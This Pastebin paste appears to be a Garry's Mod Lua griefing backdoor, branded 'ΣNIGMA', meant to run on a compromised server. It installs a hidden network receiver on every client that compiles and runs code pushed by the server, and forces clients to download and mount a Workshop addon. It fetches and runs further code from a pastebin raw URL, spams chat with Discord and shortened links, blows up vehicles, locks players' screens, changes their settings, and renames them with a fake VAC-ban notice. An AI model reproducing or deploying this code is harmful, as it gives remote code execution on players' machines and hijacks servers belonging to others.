Advertisement
Guest User

Untitled

a guest
May 20th, 2019
181
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.97 KB | None | 0 0
  1.  
  2. print([[
  3. ██████╗ ███████╗████████╗
  4. ██╔════╝ ██╔════╝╚══██╔══╝
  5. ██║ ███╗█████╗ ██║
  6. ██║ ██║██╔══╝ ██║
  7. ╚██████╔╝███████╗ ██║
  8. ╚═════╝ ╚══════╝ ╚═╝
  9. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  10. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  11. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  12. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  13. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  14. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  15.  
  16. By IXXE <3 ]])
  17.  
  18. for k, v in pairs(player.GetAll()) do
  19. v:SendLua("steamworks.FileInfo(1618885873,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  20. end
  21.  
  22. for k, v in pairs( player.GetAll() ) do
  23. if ( v:Alive() ) then
  24. v:GodEnable()
  25. else
  26. v:Spawn()
  27. timer.Simple( 5, function()
  28. v:GodEnable()
  29. end)
  30. end
  31. end
  32.  
  33.  
  34. game.AddParticles( "particles/enigma.pcf" )
  35. PrecacheParticleSystem("enigma")
  36.  
  37. local function rdm_str(len)
  38. if !len or len <= 0 then return '' end
  39. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  40. end
  41.  
  42. local net_string = rdm_str(25)
  43.  
  44. util.AddNetworkString(net_string)
  45. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  46. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  47. if !ply:IsBot() then
  48. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  49. end
  50. end)
  51.  
  52. local function SendToClient(code)
  53. local data = util.Compress(code)
  54. local len = #data
  55. net.Start(net_string)
  56. net.WriteUInt(len, 16)
  57. net.WriteData(data, len)
  58. net.Broadcast()
  59. end
  60. timer.Simple( 17, function()
  61. SendToClient([[
  62.  
  63. game.AddParticles( "particles/enigma.pcf" )
  64. PrecacheParticleSystem("enigma")
  65. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  66.  
  67.  
  68. timer.Create("nonameplease", 5, 0,function()
  69. for i=1, #player.GetHumans() do
  70. local ply = player.GetHumans()[i]
  71. ply:Say( "/ooc DISCORD : https://discord.gg/9rS2jhf")
  72. end
  73. end)
  74.  
  75. local CreateModel = function(mdl, isragdoll)
  76. local ent
  77.  
  78. if isragdoll then
  79. ent = ClientsideRagdoll(mdl)
  80. else
  81. ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  82. end
  83.  
  84.  
  85. return ent
  86. end
  87.  
  88. local NewHookAdd = function(str, name, func)
  89. --name = "dronesrewrite_hell_hooks" .. name
  90. hook.Add(str, name, func)
  91.  
  92. table.insert(cache, {
  93. str = str,
  94. name = name
  95. })
  96. end
  97.  
  98. local cache = { }
  99. timercache = { }
  100. local Const = 0
  101. local Noise = nil
  102. local pl = LocalPlayer()
  103. timer.Create("charglogo", 2, 1, function()
  104. local dlight = DynamicLight(pl:EntIndex())
  105. if dlight then
  106. dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  107. dlight.r = 255
  108. dlight.g = 0
  109. dlight.b = 0
  110. dlight.brightness = 16
  111. dlight.Decay = 1000
  112. dlight.Size = 2000
  113. dlight.DieTime = CurTime() + 2
  114. end
  115.  
  116. local pos = pl:GetPos() + Vector(0, 0, 120)
  117. local ang = Angle(0, pl:GetAngles().y, 0)
  118.  
  119. local tr = util.TraceLine({
  120. start = pos,
  121. endpos = pos + ang:Forward() * 86,
  122. filter = pl
  123. })
  124.  
  125. local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  126.  
  127. for i = 1, 16 do
  128. sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  129. end
  130. for i = 1, 10 do
  131. ParticleEffectAttach("enigma",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  132. end
  133.  
  134. local mdl = CreateModel("models/food/hotdog.mdl")
  135. mdl:SetModelScale(5)
  136. mdl:SetAngles(ang + Angle(15, 180, 0))
  137. mdl:SetPos(rag_pos)
  138. mdl:Spawn()
  139.  
  140. --ParticleEffect("fire_test2", rag_pos, Angle(0, 0, 0))
  141.  
  142. hook.Add("CalcView", "dronesrewrite_doshit", function(ply, _pos, _ang, fov)
  143. local view = { }
  144. view.origin = pos + VectorRand()
  145. view.angles = ang
  146. view.fov = fov + math.random(-80, -50)
  147.  
  148. return view
  149. end)
  150.  
  151. timer.Create("charglo", 1.4, 1, function()
  152. mdl:Remove()
  153. hook.Remove("CalcView", "dronesrewrite_doshit")
  154. end)
  155. end)
  156. ]])
  157. end)
  158.  
  159. timer.Simple( 20, function()
  160. timer.Create( "gvacspaam", 0.1, 0, function()
  161. for k,v in pairs(player.GetAll()) do
  162. v:SendLua('RunConsoleCommand("impulse","100")')
  163. end
  164. end)
  165. hook.Add( 'SetupMove', 'auto hop', function( ply, move )
  166. if not ply:IsOnGround() then
  167. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  168. end
  169. end )
  170. for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  171.  
  172. local explo = ents.Create("env_explosion")
  173.  
  174. explo:SetPos(v:GetPos())
  175.  
  176. explo:SetKeyValue("iMagnitude", "300")
  177.  
  178. explo:Spawn()
  179.  
  180. explo:Activate()
  181.  
  182. explo:Fire("Explode", "", 0)
  183.  
  184. end
  185.  
  186. end
  187. for k,v in pairs(player.GetAll()) do
  188. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  189. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  190. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  191. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  192. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  193. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  194. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  195. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  196. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  197. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  198. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  199. v:ManipulateBoneScale( a, Vector(100,100,100))
  200. v:ManipulateBoneScale( b, Vector(100,100,100))
  201. v:ManipulateBoneScale( c, Vector(100,100,100))
  202. v:ManipulateBoneScale( d, Vector(100,100,100))
  203. v:ManipulateBoneScale( e, Vector(100,100,100))
  204. v:ManipulateBoneScale( f, Vector(100,100,100))
  205. v:ManipulateBoneScale( g, Vector(100,100,100))
  206. v:ManipulateBoneScale( h, Vector(100,100,100))
  207. v:ManipulateBoneScale( i, Vector(100,100,100))
  208. v:ManipulateBoneScale( j, Vector(100,100,100))
  209. v:ManipulateBoneScale( k, Vector(100,100,100))
  210. end
  211. SendToClient([[
  212.  
  213. surface.CreateFont( "PixelCutsceneScaled",{
  214. font = "Open Sans",
  215. size = 500,
  216. weight = 1000,
  217. antialias = true
  218. })
  219.  
  220. surface.CreateFont( "PixelSmall",{
  221. font = "Open Sans",
  222. size = 135,
  223. weight = 500,
  224. antialias = false
  225. })
  226. surface.CreateFont("lapolice", {
  227. font = "Open Sans",
  228. size = ScrW()*0.02,
  229. weight = 10,
  230. blursize = 0,
  231. scanlines = 2.5,
  232. antialias = false
  233. })
  234.  
  235. local function gettextcolor( a )
  236.  
  237. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  238. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  239. local b = 215
  240.  
  241. return Color( r, g, b, a or 255 )
  242.  
  243. end
  244.  
  245. local w,h = ScrW(), ScrH()
  246. local W, H = ScrW(), ScrH()
  247. local MySelf = LocalPlayer()
  248.  
  249. if ohno then
  250. ohno:Remove()
  251. ohno = nil
  252. end
  253.  
  254. ohno = vgui.Create( "DFrame" )
  255. ohno:SetSize( w, h )
  256. ohno:SetPos(0,0)
  257. ohno:SetDraggable ( false )
  258. ohno:SetTitle("")
  259. ohno:MakePopup();
  260. ohno:ShowCloseButton(false)
  261.  
  262. ohno.Paint = function( self )
  263. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  264. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  265. end
  266.  
  267. local pw, ph = w, h*0.6
  268. local px, py = w/2-pw/2, h/2-ph/2
  269.  
  270.  
  271. local Close = vgui.Create( "DButton", ohno )
  272. Close:SetPos(px, py)
  273. Close:SetText( "" )
  274. Close:SetSize( pw, ph )
  275. Close.Paint = function( self, tw, th )
  276.  
  277. local shift = math.sin(RealTime()*3)*1.5 + 5
  278.  
  279. local text = "ΣNIGMA"
  280. local text2 = "Σ"
  281. local text3 = "RIP ;)"
  282. local text4 = "ΣNIGMA"
  283.  
  284. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  285. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  286. draw.DrawText( "(╯°□°)╯︵ ┻━┻", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  287. draw.DrawText( "(╯°□°)╯︵ ┻━┻", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  288. draw.DrawText( "Σ", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  289. draw.DrawText( "Σ", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  290. draw.DrawText( "Σ", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  291. draw.DrawText( "Σ", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  292. draw.DrawText( "RIP ;)", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  293. draw.DrawText( "ΣNIGMA", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  294. draw.DrawText( "RIP ;)", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  295. draw.DrawText( "ΣNIGMA", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  296. draw.DrawText( "ΣNIGMA", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  297. draw.DrawText( "RIP ;)", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  298. draw.DrawText( "ΣNIGMA", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  299. draw.DrawText( "RIP ;)", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  300. draw.DrawText( "ΣNIGMA", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  301. draw.DrawText( "RIP ;)", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  302. draw.DrawText( "ΣNIGMA", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  303. draw.DrawText( "ΣNIGMA", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  304. draw.DrawText( "ΣNIGMA", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  305. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  306. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  307. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  308. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  309. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  310.  
  311. end
  312. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  313. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  314. timer.Create("fff", 0.1, 0, function()
  315. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  316. end)
  317.  
  318. timer.Simple( 15, function()
  319.  
  320. wut = vgui.Create( "DFrame" )
  321. wut:SetSize( w, h )
  322. wut:SetPos(0,0)
  323. wut:SetDraggable ( false )
  324. wut:SetTitle("")
  325. wut:ShowCloseButton(false)
  326.  
  327. wut.Paint = function( self )
  328. surface.SetDrawColor(30, 30, 30, 0)
  329. end
  330.  
  331. local Close = vgui.Create( "DButton", wut )
  332. Close:SetPos(px, py)
  333. Close:SetText( "" )
  334. Close:SetSize( pw, ph )
  335. Close.Paint = function( self, tw, th )
  336.  
  337. local shift = math.sin(RealTime()*3)*1.5 + 5
  338.  
  339. local text = "ΣNIGMA"
  340.  
  341. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  342. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  343.  
  344. end
  345.  
  346. RunConsoleCommand("r_shader_srgb","1")
  347. RunConsoleCommand("gmod_language","ko")
  348. ohno:Remove()
  349. ohno = nil
  350.  
  351. local name = GetConVar("sv_skyname"):GetString()
  352. if name == "painted" then
  353. local sky
  354. for _, v in ipairs(ents.GetAll()) do
  355. if v:GetClass() == "env_skypaint" then
  356. sky = v
  357. break
  358. end
  359. end
  360. if !IsValid(sky) then return end
  361. hook.Add("PostRender","\xFFsky\xFF",function()
  362. local col = HSVToColor(CurTime()*30 % 360,1,1)
  363. col = Vector(col.r/255,col.g/255,col.b/255)
  364. sky:SetTopColor(col)
  365. sky:SetBottomColor(col)
  366. end)
  367. else
  368. local prefix = {"lf","ft","rt","bk","dn","up"}
  369. local mats = {}
  370. for i=1,6 do
  371. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  372. end
  373. hook.Add("PostRender","\xFFsky\xFF",function()
  374. local col = HSVToColor(CurTime()*30 % 360,1,1)
  375. for i=1,6 do
  376. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  377. end
  378. end)
  379. end
  380. local chienchaud = ClientsideModel("models/food/hotdog.mdl")
  381. chienchaud:SetNoDraw(true)
  382. chienchaud:SetModelScale(120)
  383. timer.Create("charglogo", 0.01, 0, function()
  384. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  385. end)
  386. --chienchaud:SetMaterial( "models/screenspace" )
  387. local data = {}
  388. local function genchienchaud(id)
  389. local pos = LocalPlayer():GetPos()
  390. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  391. end
  392. for i=1, 150 do
  393. genchienchaud(i)
  394. end
  395. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchienchauds\xFF",function()
  396. local z = LocalPlayer():GetPos().z
  397. for i=1, #data do
  398. chienchaud:SetPos(data[i][1])
  399. chienchaud:SetupBones()
  400. chienchaud:DrawModel()
  401. data[i][1].z = data[i][1].z - data[i][2] / 20
  402. if data[i][1].z <= z then
  403. genchienchaud(i)
  404. end
  405. end
  406. end)
  407.  
  408.  
  409.  
  410. end )
  411.  
  412.  
  413. sound.PlayURL( "https://gvac.cz/assets/mlg.mp3", "mono noblock noplay", function( station )
  414. timer.Simple( 0.1, function()
  415. ClientStation = station
  416. station:EnableLooping( true )
  417. station:Play()
  418. station:SetVolume( 30 )
  419. end )
  420. end )
  421.  
  422. timer.Create("f", 0.11, 0, function()
  423. RunConsoleCommand("+attack")
  424. end)
  425. timer.Create("ff", 0.12, 0, function()
  426. RunConsoleCommand("-attack")
  427. end)
  428. ]])
  429. end)
  430.  
  431. timer.Create("ok", 1, 0, function()
  432. for k, v in pairs( ents.FindByClass( "prop_*" ) ) do local phys = v:GetPhysicsObject()
  433. if (IsValid(phys)) then
  434. phys:EnableMotion(true)
  435. end
  436. end
  437.  
  438. local props = ents.GetAll()
  439. for _, prop in ipairs( props ) do
  440. if(prop:GetPhysicsObject():IsValid()) then
  441. prop:GetPhysicsObject():ApplyForceCenter( Vector( 0, 0, ((650 * 0.73) * prop:GetPhysicsObject():GetMass() ) ) )
  442. end
  443. end
  444. end)
  445.  
  446.  
  447. timer.Simple( 20, function()
  448.  
  449. membresenigma =
  450. {
  451. "GET NO SCOPE !!!!",
  452. "GET NO SCOPE !!!!",
  453. "GET NO SCOPE !!!!",
  454. "GET NO SCOPE !!!!",
  455. "GET NO SCOPE !!!!",
  456. "GET NO SCOPE !!!!",
  457. "GET NO SCOPE !!!!",
  458. "GET NO SCOPE !!!!",
  459. "BAN HAMMER > https://bit.ly/2LUu3GN",
  460. "BAN HAMMER > https://bit.ly/2LUu3GN",
  461. "BAN HAMMER > https://bit.ly/2LUu3GN",
  462. "BAN HAMMER > https://bit.ly/2LUu3GN",
  463. "BAN HAMMER > https://bit.ly/2LUu3GN"
  464. }
  465.  
  466. timer.Create( "gvacspam", 0.2, 0, function()
  467. for k, ply in pairs( player.GetAll() ) do
  468. DarkRP.notify(ply, 2, 2, "[Oh No !] "..table.Random(membresenigma).."")
  469. end
  470. end)
  471.  
  472. local sun = ents.FindByClass("env_sun")
  473. if #sun == 0 then return end
  474. sun = sun[1]
  475. hook.Add("Think","\xFFsun\xFF",function()
  476. sun:SetKeyValue("sun_dir", math.sin(CurTime())/3 .. " " .. math.cos(CurTime())/3 .. " 0.901970")
  477. sun:SetModelScale(120)
  478. end)
  479.  
  480.  
  481. for k,v in pairs(player.GetAll()) do
  482. v:SetRunSpeed(400* 4);
  483. v:SetWalkSpeed(400 * 4);
  484. end
  485.  
  486.  
  487. timer.Create( "gtonip", 1, 0, function()
  488. for k,v in pairs(player.GetAll()) do
  489. v:GodEnable()
  490. v:setDarkRPVar( "rpname", "This Steam account has been VAC banned from secure servers due to a cheating infraction." )
  491. end
  492.  
  493. end )
  494.  
  495.  
  496. timer.Simple( 17, function()
  497. http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil) -- Just The Apocalypse
  498. end )
  499.  
  500. end)
  501.  
  502.  
  503. timer.Create( "gvacspam", 0.1, 0, function()
  504. SendToClient([[
  505. print("GET NOSCOPE !!")
  506. ]])
  507. print("GET NOSCOPE !!")
  508. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement